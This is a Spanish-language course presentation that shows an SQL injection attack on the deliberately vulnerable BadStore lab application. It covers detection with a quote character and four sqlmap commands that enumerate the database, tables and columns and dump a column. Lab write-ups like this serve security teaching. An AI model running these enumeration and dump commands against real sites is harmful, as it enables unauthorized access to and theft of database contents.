ataque por inyección de código sql
DESCRIPTION
Ataque realizado a la base de datos de Badstore, con lo cual se debe obtener toda la información sobre la base de datos por ejemplo servidor de BD y versión, nombre de la base de datos, nombre de las tablas, información de las tablas, información de las columnas, etc.TRANSCRIPT
Especialización en Seguridad Informática
Ataque por inyección de código SQL,
JOSÉ ALFREDO RAMÍREZ PRADA
Espinal, Septiembre de 2014
Ataque a la base de datos de Badstore
Una vez instalada la máquina virtual se procede a la configuración para instalar BadStore, se instala la aplicación Python 2.7.8.
Ataque a la base de datos de Badstore
una vez iniciada la maquina virtual "BADSTORE", por medio del comando IFCONFIG, obtenemos la dirección IP (192.168.56.101) a la cual acceder desde nuestro explorador, con el fin de identificar las vulnerabilidades de Sql Injections, por ejemplo se introduce una comilla en el campo “Search” del formulario "What´s New", y observamos un mensaje de error SQL.
Ataque a la base de datos de BadstoreIdentificada la vulnerabilidad, podemos atacar por medio de la consola de comando de Windows, ubicados en el directorio C:\sqlmap
sqlmap.py -u "http://192.168.56.101/cgi-bin/badstore.cgi?searchquery=%22&action=search&x=0&y=0" --current-db
Se confirma la vulnerabilidad y sqlmap ha sido capaz de detectar el motor de base de datos MySQL 4 y el servidor Web Apache 1.3.28, el nombre de la base de datos 'BADSTOREDB'.
Ataque a la base de datos de Badstore
Seguidamente podemos identificar las tablas de la Base de Datos por medio del comando:
sqlmap.py -u "http://192.168.56.101/cgi-bin/badstore.cgi?searchquery=%22&action=search&x=0&y=0" -D badstoredb --tables
Ataque a la base de datos de Badstore
una vez identificada la tabla (itemdb) podremos identificar información de las columnas y de los campos, correspondientemente con los siguientes comandos:
sqlmap.py -u "http://192.168.56.101/cgi-bin/badstore.cgi?searchquery=%22&action=search&x=0&y=0" -D badstoredb -T itemdb --columns
sqlmap.py -u "http://192.168.56.101/cgi-bin/badstore.cgi?searchquery=%22&action=search&x=0&y=0" -D badstoredb -T itemdb -C ldesc --dump
Ataque a la base de datos de Badstore
De esta forma obtenemos toda la información sobre la base de datos de Badstore.
Especialización en Seguridad Informática
GRACIAS POR SU ATENCIÓN